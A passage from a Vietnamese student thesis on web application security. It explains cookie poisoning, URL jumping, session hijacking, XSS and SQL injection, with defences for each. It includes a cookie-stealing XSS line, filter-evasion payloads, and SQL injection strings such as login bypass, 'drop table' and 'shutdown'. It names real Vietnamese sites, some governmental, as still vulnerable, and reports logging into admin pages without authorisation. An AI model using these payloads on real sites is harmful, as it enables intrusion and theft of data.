Tham số newpasswd là mật khẩu mới cho user có giá trị guessWho
Trong ví dụ này ta thay đổi tham số newpaswd có giá trị là guessWho thành
bigDummy.
2.2.3.2. Cách phòng chống
• Xử lý tham số như xử lý phần người dùng nhập vào.
• Kiểm tra giá trị của chúng khi gửi lên server.
2.2.4. Nhiêm độc cookie
Cookie là dữ liệu dùng chung của server và client, do server tạo ra và lưu ở máy
tính của client (có thể lâu dài hoặc không lâu dài).
Cookie được lưu ở dạng file text và chứa những thông tin về người dùng, phiên
làm việc hiện tại hay đã kết thúc…Cookie của mỗi ứng dụng web là khác nhau tùy vào
người thiết kế ứng dụng, khác nhau theo cả trình duyệt web của người dùng.
Cookie có thể được thay đổi dễ dàng trong file text.
Hình 2-2 Dạng cookie của Internet Explorer.
2.2.4.1. Kỹ thuật tấn công nhiễm độc cookie
Hacker sẽ thay đổi những giá trị các trường trong cookie như là:
• Thay đổi thời hạn của cookie
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 19 - Đại học Công Nghệ - ĐHQGHN
• Thay đổi các dữ liệu xác thực
• Thay đổi thông tin giỏ hàng
2.2.4.2. Cách phòng chống
Ta sẽ dùng một số cách sau để chống lại tấn công nhiễm độc cookies
• Không sử dụng cookie để lưu những dữ liệu xác thực
• Mã hóa các dữ liệu quan trọng
• Xử lý cookie như một trường dữ liệu do người dùng nhập vào
• Mã hóa tất cả thông tin của cookie.
2.2.5. Tấn công bằng nhảy URL
2.2.5.1. Kỹ thuật tấn công nhảy URL
Người dùng gõ vào một URL và nhảy tới trang đó, không tuân theo thứ tự các
trang thông thường của ứng dụng.
Ví dụ: Người dùng có thể truy cập mà không cần đăng nhập
Người dùng có thể mua hàng mà không cần trả tiền.
Hình 2-3 Thứ tự các trang trong ứng dụng thanh toán trực tuyến
2.2.5.2. Cách phòng chống
• Hạn chế truy cập vào tất cả các URL không dành cho người sử dụng như những
trang dành cho admin
• Khóa sự truy cập vào những nơi không phải là trang web
• Sử dụng thêm cookie, trường ẩn để chặn truy cập vào các trang không đúng
trình tự
2.2.6. Chiếm hữu phiên làm việc (Session hijacking)
Ứng dụng web lưu trạng thái mỗi phiên làm việc của người dùng bằng mã phiên
làm việc (session ID). Server sẽ cung cấp mỗi session ID khác nhau cho mỗi người
dùng khác nhau để chứng thực phiên làm việc đó.
Để duy trì phiên làm việc, SessionID thường được lưu vào:
• Tham số CGI
• Trường ẩn trong form
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 20 - Đại học Công Nghệ - ĐHQGHN
• Các cookie
Thông thường, sau khi người dùng được chứng thực dựa trên những thông tin cá
nhân như tên/mật khẩu, session ID được xem như một mật khẩu tĩnh tạm thời cho
những lần yêu cầu tiếp theo. Điều này đã khiến cho Session ID là mục tiêu lớn cho
những hacker. Trong nhiều trường hợp, hacker giành được session ID hợp lệ của
người dùng để từ đó đột nhập vào phiên làm việc của họ.
Hình 2-4 SessionID được lưu trong tham số CGI
2.2.6.1. Kỹ thuật tấn công chiếm hữu phiên làm việc
Những kẻ tấn công có thể thực hiện những cách sau:
• Đoán mã của một phiên làm việc hợp lệ
• Ăn cắp một mã phiên qua các mạng lưới giám sát.
Hình 2-5 Ăn cắp SessionID bằng cách giám sát đường truyền (nguồn:
)
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 21 - Đại học Công Nghệ - ĐHQGHN
• Ăn cắp một mã phiên thông qua XSS. Hacker sẽ sử dụng đoạn mã
trên trình duyệt của nạn nhân và gửi kết quả về máy của mình.
• Ấn định phiên làm việc. (Session fixation)
Trong tấn công ấn định phiên làm việc, kẻ tấn công ấn định sẵn SessionID cho
nạn nhân trước khi họ đăng nhập vào hệ thống. Sau đó kẻ tấn công sẽ sử dụng
SessionID này để tiếp tục phiên làm việc của nạn nhân.
Hình 2-6 Tấn công ấn định phiên làm việc.
Tấn công ấn định phiên làm việc gồm ba bước:
Bước 1: Tạo ra phiên làm việc:
Đầu tiên kẻ tấn công tạo ra một phiên làm việc “bẫy” theo hướng của hệ thống.
Có hai hướng có thể:
• Hướng tự do: chấp nhận bất kỳ một session ID nào, nếu chưa tồn tại
session thì tạo mới một session ID.
• Hướng giới hạn: chỉ chấp nhận một session ID đã đăng ký trước đó.
Với hệ thống hướng tự do thì hacker chỉ cần thiết lập một session ID bất kỳ, nhớ
và sau đó sử dụng lại session ID này. Ở hướng giới hạn, hacker phải đăng ký một
session ID với ứng dụng.
Bước 2: Ấn định phiên làm việc:
Tiếp theo kẻ tấn công phải giới thiệu session ID này tới trình duyệt của người
dùng, có thể là gửi thư điện tử. Như vậy là ấn định phiên làm việc của người đó.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 22 - Đại học Công Nghệ - ĐHQGHN
Bước 3: đột nhập vào phiên làm việc của họ.
Cuối cùng, kẻ tấn công đợi đến lúc người dùng đăng nhập vào server đích sử
dụng session ID đã được ấn định trước đó và đột nhập vào phiên làm việc của người
dùng đó.
Hình 2-7 các bước tấn công ấn định phiên làm việc.
2.2.6.2. Các cách phòng chống tấn công chiếm hữu phiên làm việc
• Bảo vệ cookie chứa session ID bằng cách thiết lập bit an toàn SSL.
• Tạo ra session ID mới cho mỗi yêu cầu.
• Sử dụng thời gian hết hạn của cookie ngắn nhất có thể
• Cho phép người dùng thoát ra khỏi hệ thống, xóa đi phiên làm việc của họ.
• Không cho phép người dùng tự chọn định danh cho phiên làm việc của họ.
• Sử dụng trường HTTP REFERER để nhận biết nhiều trình duyệt của người
dùng có cùng ID.
2.3. Tấn công chèn mã lệnh thực thi trên trình duyệt nạn nhân
(cross-site scripting) – XSS
2.3.1. Giới thiệu về cross-site scripting
Cross-site cripting (XSS) là một dạng lỗ hổng trong bảo mật máy tính chủ yếu
được tìm thấy trong ứng dụng web mà cho phép người dùng chèn mã độc hại và sẽ
được xem bởi những người dùng khác.Có rất nhiều loại mã như mã HTML và mã kịch
bản phía client. Một cuộc khai thác lỗ hổng XSS có thể được những kẻ tấn công dùng
để vượt qua trình quản lý truy. Những lỗ hổng loại này được khai thác để tấn công lừa
đảo và khai thác trình duyệt. Từ năm 2007, XSS được tiến hành trên nhiều website và
chiếm khoảng 80% tài liệu về các lỗ hổng. Trong một cuộc tấn, người dùng cuối có thể
là đối tượng của sự truy cập trái phép, ăn cắp dữ liệu nhạy cảm, và bị mất tiền.
Trong những năm gần đây, XSS vượt cả buffer overflow để trở thành báo cáo
lỗ hổng bảo mật phổ biến nhất. Ít nhất có khoảng 68% các trang web là có lỗi XSS với
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 23 - Đại học Công Nghệ - ĐHQGHN
những người dùng của họ. Tấn công XSS có thể vượt qua các trình an ninh của hệ
thống. Bằng việc tìm ra một cách thông minh để tiêm mã độc vào trang web, một kẻ
tấn công có thể có được đặc quyền truy cập vào các nội dung nhạy cảm của trang, các
cookie về phiên làm việc, và nhiều đối tượng khác.
Cross site scripting đầu tiên được gọi tắt là CSS, mặc dù được sử dụng rộng rãi
nhưng bị ngưng lại vì nhầm lẫn với Cascading Style Sheets.
Tấn công XSS được viết ở dạng ngôn ngữ kịch bản phía client, chủ yếu là một
dạng của ECMAScript (ví dụ: JavaScript, Jscript), có khi bao gồm cả HTML và
XHTML.
Lỗ hổng XSS được thông báo và khai thác một số trường hợp từ thập kỷ 90.
Một vài trang bị ảnh hưởng nổi lên như là trang tìm kiếm Google, dịch vụ mail của
Google và Yahoo, các trang xã hội như là Facebook, Myspace và Orkut. Các nhà phát
triển của công ty MediaWiki đã sửa ít nhất 20 lỗi XSS để bảo vệ trang Wikipedia và
những người dùng khác của wiki.
2.3.2. Kỹ thuật tấn công XSS
Các tấn công có thể:
• Lấy cắp cookie
• Chuyển hướng người dùng đến một trang web độc hại
• Trình bày nội dung giả thuyết phục người sử dụng nhập dữ liệu cá nhân
Các cách thực hiện cuộc tấn công :
• Dạng tấn công XSS được lưu trữ: những kẻ tấn công đặt những đoạn
kịch bản trên bảng nhắn tin trực tuyến, tìm kiếm sách, lưu bút, ý kiến ở
trang nhật ký… Nói chung là đoạn kịch bản được lưu lại ở trên máy chủ
và sẽ được thực thi sau đó.
• Dạng tấn công XSS được lưu trữ:Những kẻ tấn công đặt mã kịch bản
trong tham số CGI của một URL, do đó khi người dùng nhấn vào liên
kết này trang thực sẽ được tải xuống, nhưng bị thay đổi bởi kịch bản
được nhúng trong URL, liên kết thật có thể ở bất kỳ vị trí nào, không cần
thiết được lưu trên trang.
Lưu ý: XSS khác với lừa đảo, trong đó có một bản sao tấn công hợp lệ và các trang
web cố gắng lừa người sử dụng nhập vào các dữ liệu nhạy cảm trên các trang web giả
mạo.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 24 - Đại học Công Nghệ - ĐHQGHN
2.3.3. Mã kịch bản tấn công XSS
2.3.3.1. Ăn cắp mã phiên làm việc của người dùng để thực hiện chiếm
hữu phiên làm việc,
ví dụ mã sau:
document.write( "<img src=" +
escape(document.cookie) + ">" )
Thêm một thẻ ảnh ở nguồn của trang web của kẻ tấn công tại trang hiện tại .
Ảnh px.gif sẽ trở lại máy chủ của kẻ tấn công chỉ là một bức ảnh 1 pixel, bởi vì khi
bức ảnh quay lại, kẻ tấn công sẽ có được cookie trang web của nạn nhân như là
_appname_session hay là JSESSIONID từ bản ghi trên máy chủ của nạn nhân và sau
đó sẽ sử dụng cho những cuộc tấn công tiếp theo.
2.3.3.2. Tạo thủ thuật để khiến người dùng làm việc không biết đến
Nếu có thể thay thế ảnh thứ 38 trong nguồn của trang muốn tấn công
document.images[38].src=
Ảnh này được thiết kế để khiến người dùng làm việc gì mà họ không biết.
Có thể là thay đổi URL đích trong một form và nhiều thứ khác.
2.3.3.3. Các cách chèn mã có thể
Cách chèn mã với thẻ image
Giống như trên nhưng bỏ đi dấu chấm phẩy và đấu ngoặc kép
Thay đổi một chút
Mã hóa các thực thể HTML
Sử dụng dấu “`” trong chuỗi kịch bản vì nhiều nhà phát triển không để ý đến nó.
Đặt mã kịch bản vẫn trong thẻ IMG nhưng nằm trong dấu ngoặc kép
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 25 - Đại học Công Nghệ - ĐHQGHN
alert("XSS")">
Nếu không dấu ngoặc đơn hay kép nào được phép sử dụng ta có thể dùng hàm
fromCharCode của Javascript để tạo ra các chuỗi từ mã Unicode
Hoặc sử dụng mã hóa UTF-8 Unicode
<IMG
SRC=javascript:&
#97;lert('XSS')>
Mã hóa UTF-8 dạng dài, không có dấu chấm phẩy,
<IMG
SRC=javasc
114ipt:al
1rt('XSS&
#0000039)>
Mã hóa hệ 16
<IMG
SRC=javascript:
x61lert('XSS')>
Thêm vào một “tab”
Mã hóa “tab” ở trên
Nhúng vào phần xuống dòng trong mã
Nhúng ký tự quay lại
Mã Javascript được trải ra trên nhiều dòng
Ngoài thẻ IMG, ta có thể áp dụng các cách trên với các thẻ khác trong HTML và mã
kịch bản khác. Các thẻ có thẻ chèn mã kịch bản
mã
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 26 - Đại học Công Nghệ - ĐHQGHN
@import’trang độc hại’;
; REL=stylesheet">
XSS
Nguồn :
2.3.4. Các cách phòng chống
• Phương pháp đầu tiên và đơn giản nhất là thay thế các dấu ngoặc với >.<.
• Đối với người dùng, cần cấu hình lại trình duyệt để nhắc nhở người dùng có
cho thực thi ngôn ngữ kịch bản trên máy của họ hay không? Tùy vào mức độ
tin cậy mà người dùng sẽ quyết định.
• Tạo ra danh sách những thẻ HTML được phép sử dụng
• Xóa bỏ và lọc
o Xóa bỏ thẻ
o Lọc ra bất kì một đoạn mã JavaScript/Java/VBScript/ActiveX/Flash
Related nào.
o Lọc dấu nháy đơn hay kép
o Lọc kí tự Null ( vì khả năng thêm một đoạn mã bất kì sau kí tự Null
khiến cho ứng dụng dù đã lọc bỏ thẻ vẫn không nhận ra do
ứng dụng nghĩ rằng chuỗi đã kết thúc từ kí tự Null này).
o Xóa những kí tự “ > ”, “ < ”
o Vẫn cho phép nhập những kí tự đặc biệt nhưng sẽ được mã hóa theo
chuẩn riêng.
• Bảo mật cookie: Chỉ cho phép một IP xác định sử dụng cookie đã được
cung cấp, không thể có hai IP khác nhau sử dụng cùng một cookie.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 27 - Đại học Công Nghệ - ĐHQGHN
2.3.5. Một số trang vẫn còn lỗ hổng của Việt Nam:
Tên công ty Tên miền Liên kết bị khai thác
Cục Hải
Quan Bình
Định
www.haiqua
nbinhdinh.g
ov.vn
TELEX&noidung=%27%22%3E%3C%2Ftitle%3E%3C
script%3Ealert(1337)%3C%2Fscript%3E%3E%&TKthe
o=0&TKmuc=0&btn_submit=T%C3%ACm+ki%E1%B
A%BFm
Siêu thị
Megabuy.vn
www.megab
uy.vn
eyword=%22%3E%3Cscript%3Ealert(1337)%3C/script
%3E&x=0&y=0
Sổ tay thẩm
phán – Tòa
án nhân dân
tối cao Việt
Nam
sotaythamp
han.gov.vn
h&hidLang=en&searchterm=l%C6%B0c%27%22%3E%
3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%
3E%
Viện năng
lượng
nguyên tử
Việt Nam
www.vaec.g
ov.vn
%2013k%20-
%20%C4%90%C3%A3%20l%C6%B0u%20tro%27%22
%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script
%3E%3E
Nguồn:
2.4. Tấn công bằng kỹ thuật chèn mã SQL (SQL Injection)
2.4.1. Giới thiệu về SQL Injection
SQL injection là một kỹ thuật cho phép kẻ tấn công lợi dụng lỗ hổng trong việc
kiểm tra dữ liệu nhập trong ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở
dữ liệu để tiêm vào và thi hành các câu lệnh SQL bất hợp pháp mà không được người
phát triển ứng dụng lường trước. Kết quả là kẻ tấn công có thể có quyền sử dụng cơ sở
dữ liệu, hiệu chỉnh và xóa. Vấn đề này xảy ra trên hầu hết các hệ quản trị cơ sở dữ liệu
như SQL Server, My SQL, Oracle, DB2, Sysbase…
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 28 - Đại học Công Nghệ - ĐHQGHN
Hình 2-8 Hacker thực hiện một cuộc tấn công thành công vào ứng dụng web (nguồn:
Hacker chèn câu lệnh SQL tới cơ sở dữ liệu thông qua trình khách của ứng dụng web
để lấy thông tin chi tiết về thẻ tín dụng. Quá trình thực hiện của hacker như sau:
1. Một kẻ tấn công tìm thấy lỗ hổng ở trang dành cho khách hàng của ứng dụng
web và gửi một tấn công qua cổng 80/443 tới máy chủ web.
2. Máy chủ web nhận mã độc hại và gửi tới máy chủ ứng dụng web.
3. Máy chủ ứng dụng web nhận mã độc từ máy chủ web và gửi tới máy chủ cơ sở
dữ liệu.
4. máy chủ cơ sở dữ liệu nhận mã độc, thực thi trên cơ sở dữ liệu và đưa ra dữ liệu
từ bảng thẻ tín dụng.
5. Máy chủ web tạo ra một trang động với nội dung bao gồm thông tin chi tiết về
thẻ tín dụng từ cơ sở dữ liệu.
6. máy chủ web gửi thông tin thẻ tín dụng tới cho hacker.
Các ký hiệu trong hình:
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 29 - Đại học Công Nghệ - ĐHQGHN
mô tả dữ liệu dịch chuyển giữa máy của hacker và máy chủ web thông qua
cổng 80/443, cũng là của máy chủ ứng dụng web, máy chủ cơ sở dữ liệu, cơ
sử dữ liệu
đường truyền hai chiều giữa hacker và máy chủ web.
dữ liệu thẻ tín dụng được lấy ra khỏi cơ sở dữ liệu
2.4.2. Các dạng tấn công SQL Injection
Ta sử dụng bảng User cho các minh họa
STT Tên trường Cài đặt vật lý Kiểu Lưu thông tin
1 Username Khóa chính Varchar(50) Tên đăng nhập, duy nhất
2 Password Not null Varchar(20) Mật khẩu đăng nhập
2.4.2.1. Dạng tấn công vượt qua trang đăng nhập
Giả sử ứng dụng web kiểm tra đăng nhập có đoạn như sau:
SQLQuery= “SELECT Username FROM User WHERE Username= ‘” &
Uname & “’ AND Password= ‘” & Pass & “’”
flag= GetQueryResult (SQLQuery)
if flag = “” then
check=FALSE
else
check=TRUE
end if
Đoạn mã trên kiểm tra chuỗi nhập Username và Password. Nếu tìm thấy thì biến check
là true ngược lại là false.
Nếu giá trị nhập là: Username = ’ OR ‘’=’, Password= ’ OR ‘’=’
Thì câu lệnh SQL sẽ là
SELECT Username FROM User WHERE Username= ‘’ OR ‘’=’‘ AND
Password= ‘’ OR ‘’=’’
Kết quả trả về người dùng đầu tiên trong bảng vì so sánh ‘’ và ‘’ luôn đúng.
Ta có thể kết hợp các ký tự như “;” hay “--” để
Xóa bảng User: đặt username là : “’; drop table User-- ”
Câu lệnh SQL trở thành:
SELECT Username FROM User WHERE Username= ‘’;drop table User--
AND Password= ‘” & Pass & “’”
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 30 - Đại học Công Nghệ - ĐHQGHN
2.4.2.2. Tấn công dựa vào câu lệnh SELECT
Dạng tấn công này phải khai thác các thông báo lỗi của hệ thống tìm ra điểm yếu
để tấn công.
Khi ta yêu cầu một trang có ID là 123 theo URL sau
Nếu trang có ID này tồn tại trong cơ
sở dữ liệu thì kết quả sẽ trả về đúng trang đó. Mã nguồn của server trong trường hợp
này có dạng
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID 3
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
Nếu ta thay giá trị của ID trở thành 0 OR 1=1
Câu truy vấn SQL sẽ trở thành
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Và trả về kết quả là tất cả các bản ghi có trong bảng T_NEWS.
2.4.2.3. Tấn công dựa vào câu lệnh kết hợp UNION
Lệnh SELECT được dùng để lấy thông tin từ cơ sở dữ liệu. Thông thường vị trí
có thể được chèn thêm vào một mệnh đề SELECT là sau WHERE. Để có thể trả về
nhiều dòng thông tin trong bảng, thay đổi điều kiện trong mệnh đề WHERE bằng cách
chèn thêm UNION SELECT.
StrSQL=“SELECT Username FROM User WHERE Username like ‘% “ & Name
& “’UNION SELECT Password from User”
Câu lệnh trên trả về tập hợp kết quả giữa Username và Password trong bảng User
(trong câu lênh có UNION, đối số trong hai mệnh đề select phải bằng nhau). Dựa vào
lỗi cú pháp trả về sau khi chèn câu lệnh UNION để có thể biết kiểu của môi trường.
Sau đây là những ví dụ được thực hiện khi không biết nội dung cơ sở dữ liệu dựa
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 31 - Đại học Công Nghệ - ĐHQGHN
vào HAVING, GROUP BY, UNION:
SQLQuery=“SELECT Username,Password FROM User WHERE Username= ‘”
& Uname & “’ AND Password= ‘” & Passwd & “’”
Đầu tiên, để biết tên bảng và tên trường mà câu truy vấn sử dụng, sử dụng câu
điều kiện “having” , như ví dụ sau:
Giá trị nhập vào: Username: ’having 1=1—
Lỗi phát sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server]
Column'User.Username' is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause.
Nhờ vào lỗi phát sinh này mà biết được bảng sử dụng trong câu truy vấn là User
và trong bảng tồn tại một trường tên là Username.
Sau đó sử dụng GROUP BY: Username:‘group by User.Username having 1=1--
Lỗi phát sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server]
Column'User.Password'is invalid in the select list because it is not contained in
either an aggregate function or the GROUP BYclause.
Như vậy Password là một trường của bảng User và được sử dụng trong câu truy
vấn.
Tiếp tục dùng GROUP BY cho đến khi biết được tất cả các trường trong bảng
User tham gia vào câu truy vấn.
Khi không còn báo lỗi cú pháp GROUP BY nữa thì chuyển qua công đoạn kiểm
tra kiểu của từng trường trong bảng. Lúc này UNION được sử dụng:
Username:’union select sum(Username) from User
Lệnh sum là lệnh tính tổng cho đối số bên trong dấu ngoặc. Đối số phải là kiểu số.
Nếu đối số không là kiểu số thì phát sinh lỗi như sau:
[Microsoft][ODBC SQL Server Driver][SQL Server]
The sum or average aggregate operation cannot take a varchar data type as an
argument.
Như vậy với thông điệp lỗi như trên thì Username chắc chắn phải là kiểu “varchar”.
Với phương pháp trên, dễ dàng xác định được kiểu của từng trường trong bảng.
Sau khi đã nhận đầy đủ trông tin trên thì hacker dễ dàng tự thêm thông tin vào bảng
User.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 32 - Đại học Công Nghệ - ĐHQGHN
Username:’; insert into User(tkUsername,tkPassword) values (‘admin’, ‘’)—
Hacker thêm nội dung như trên trở thành người quản trị mạng mà không cần mật khẩu
để chứng thực
Ví dụ: minh hoạ một công đoạn sẽ giúp hacker đọc hết thông tin trong bảng User:
Bước 1:
Tìm tuần tự từng dòng trên bảng User
Username:’union select 1,1
hoặc :
Username:’union select min(Username),1 from User where Username> ’a’--
Lỗi phát sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'admin' to a column of data type int.
Người đầu tiên trong bảng User là “admin”.
Bước 2: Để biết các giá trị tiếp theo, nhập chuỗi sau:
Username:’;select min(Username),1 from User where Username> ’admin’union
select 1,1 from User
Lỗi phát sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'nhimmap' to a column of data type int.
Bước 3: Thực hiện như bước 2 cho ra kết quả là từng dòng với trường Username trong
bảng User.
Bước 4: Để biết thêm về tkPasswork, có thể thực hiện như sau:
Username:’;select Password,1 from User where Username= ’admin’union select
1,1 from User
Lỗi phát sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'passOfAdmin' to a column of data type int.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 33 - Đại học Công Nghệ - ĐHQGHN
2.4.2.4. Tấn công dựa vào câu lệnh INSERT
Từ khoá INSERT dùng để đưa thông tin vào cơ sở dữ liệu. Thông thường câu
lệnh INSERT được dùng trong các trường hợp như: thông tin đăng kí người sử dụng,
guestbook…vv…
Kĩ thuật “;”, “--“ được dùng như đã từng dùng với câu lệnh SELECT, phải đảm
bảo đúng số lượng và kiểu giá trị được nhập vào nhằm tránh lỗi về cú pháp (nếu không
xác định được kiểu dữ liệu có thể nhập tất cả là số).
SQLString= “INSERT INTO User VALUES (‘” & strUsername & “’, ‘” &
strName& “’, ‘” & strPassWord & “’,’”& strLimitSize & “’)”
2.4.2.5. Tấn công dựa vào STORED PROCEDURE
Stored Procedure được sử dụng trong lập trình Web với mục đích giảm sự phức
tạp trong ứng dụng và tránh sự tấn công trong kĩ thuật SQL Injection. Tuy nhiên
hacker vẫn có thể lợi dụng những Stored Procedure để tấn công vào hệ thống.
Ví dụ: Stored procedure sp_login gồm hai tham số là username và password. Nếu
nhập:
Username: nhimmap
Password: ‘;shutdown--
Lệnh gọi stored procedure như sau:
exec sp_login ‘nhimmap’,‘’;shutdown--’
Lệnh shutdown thực hiện dừng SQL Server ngay lập tức.
2.4.3. Cách phòng chống
• Trong hầu hết trình duyệt, những kí tự nên được mã hoá trên địa chỉ URL trước
khi được sử dụng.
• Việc tấn công theo SQL Injection dựa vào những câu thông báo lỗi thì việc
phòng chống hay nhất vẫn là không cho hiển thị những thông điệp lỗi cho
người dùng bằng cách thay thế những lỗi thông báo bằng 1 trang do người phát
triển thiết kế mỗi khi lỗi xảy ra trên ứng dụng.
• Kiểm tra kĩ giá trị nhập vào của người dùng, thay thế những kí tự như ‘ ; v..v..
• Hãy loại bỏ các kí tự meta như “',",/,\,;“ và các kí tự extend như NULL, CR,
LF, ...trong các string nhận được từ:
o Dữ liệu nhập do người dùng đệ trình
o Các tham số từ URL
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 34 - Đại học Công Nghệ - ĐHQGHN
o Các giá trị từ cookie
• Đối với các giá trị numeric, hãy chuyển nó sang integer trước khi thực hiện câu
truy vấn SQL, hoặc dùng ISNUMERIC để chắc chắn nó là một số integer.
• Dùng thuật toán để mã hoá dữ liệu
• Sử dụng cơ sở dữ liệu hợp lệ khác nhau cho mục đích sử dụng khác nhau (ví dụ
như không cho phép người sử dụng ứng dụng server thực hiện lệnh DROP);
Trong chương hai, tác giả đã trình bầy một số kỹ thuật tấn công vào ứng dụng
web, để minh họa, tác giả đã thực hiện vài cuộc tấn công thành công vào một số trang
web sẽ được trình bầy trong chương ba.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 35 - Đại học Công Nghệ - ĐHQGHN
Chương 3. TẤN CÔNG THỰC NGHIỆM
3.1. URL Jumping
Nạn nhân:
Đây là trang đăng nhập của admin như hình 3.1
Hình 3-1 trang đăng nhập của admin của trang
Tấn công bằng kỹ thuật URL Jumping, sử dụng URL
Ta sẽ vào được trang admin mà không cần đăng nhập như hình 3.2:
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 36 - Đại học Công Nghệ - ĐHQGHN
Hình 3-2 Trang quản lý của admin của trang
3.2. Lỗi XSS
Nạn nhân:
Hình 3-3 Chèn mã kịch bản vào trang web
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 37 - Đại học Công Nghệ - ĐHQGHN
Khi người dùng bình thường vào trang:
sẽ thấy lỗi hiện ra như hình 3.4:
Hình 3-4 Trang bị dính lỗi XSS.
3.3. SQL Injection
3.3.1. Trang thứ nhất
URL:
Đây là một trang đăng nhập, ta vượt qua đăng nhập bằng cách sử dụng
username: ' or '1=1
password: ' or '1=1
Hình 3.5 thể hiện trang trước khi đăng nhập:
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 38 - Đại học Công Nghệ - ĐHQGHN
Hình 3-5 trang đăng nhập của admin của trang
Sau khi đăng nhập như hình 3.6:
Hình 3-6 Hình ảnh sau khi đã đăng nhập
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 39 - Đại học Công Nghệ - ĐHQGHN
3.3.2. Trang thứ hai
URL:
Đây là một trang đăng nhập, ta vượt qua đăng nhập bằng cách sử dụng
username: ' or '1=1
password: ' or '1=1
Trang trước khi đăng nhập như hình 3.7:
Hình 3-7 Trang đăng nhập của admin của trang
Sau khi đăng nhập như hình 3.8:
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 40 - Đại học Công Nghệ - ĐHQGHN
Hình 3-8 Hình ảnh sau khi đăng nhập của trang :
3.3.3. Trang thứ ba
URL:
Đây là một trang đăng nhập, ta vượt qua đăng nhập bằng cách sử dụng
username: ' or '1=1
password: ' or '1=1
Trước khi đăng nhập như hình 3.9:
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 41 - Đại học Công Nghệ - ĐHQGHN
Hình 3-9 Trang đăng nhập của admin trang
Sau khi đăng nhập:
Hình 3-10: Hình ảnh sau khi đăng nhập của trang
Trong chương ba, tác giả đã trình bầy các kết quả của một số cuộc tấn công vào
các trang web. Chương tiếp theo sẽ là phần kết luận và định hướng phát triển của luận
văn.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 42 - Đại học Công Nghệ - ĐHQGHN
CHƯƠNG 4. KẾT LUẬN
4.1. Kết quả đạt được
Khoá luận do tác giả trình bày đã thực hiện được 3 phần:
• Phần đầu trình bày tổng quan về ứng dụng web, khái niệm về bảo mật ứng
dụng web.
• Phần sau trình bày một số kỹ thuật tấn công vào ứng dụng web, cách phòng
chống tấn công.
• Phần thứ ba, luận văn đã trình bày một vài tấn công thử nghiệm vào một số
trang web theo lý thuyết các phần trước.
Trong thời gian thực hiện đề tài, tác giả đã tìm hiểu về các kỹ thuật tấn công vào
các trang web: điều kiện tấn công, lựa chọn cách thức tấn công với các trường hợp tấn
công bằng nhiều nguồn tài liệu, chủ yếu là tìm hiểu trên Internet. Tác giả đã thực hiện
những cuộc tấn công thành công và không thành công. Tuy chỉ là các tấn công đơn
giản nhưng qua đó tác giả hiểu bản chất của các cuộc tấn công và lỗi bảo mật của
những ứng dụng web đó.
4.2. Định hướng phát triển
Trong thời gian tới, nếu có điều kiện, khóa luận sẽ cố gắng phát triển thêm
những nội dung sau:
• Tìm hiểu thêm về các kĩ thuật tấn công để đưa ra phương pháp bảo mật ứng
dụng Web ở mức độ sâu hơn.
• Tìm hiểu về vấn đề bảo mật sâu hơn, không chỉ dừng ở mức độ một ứng dụng
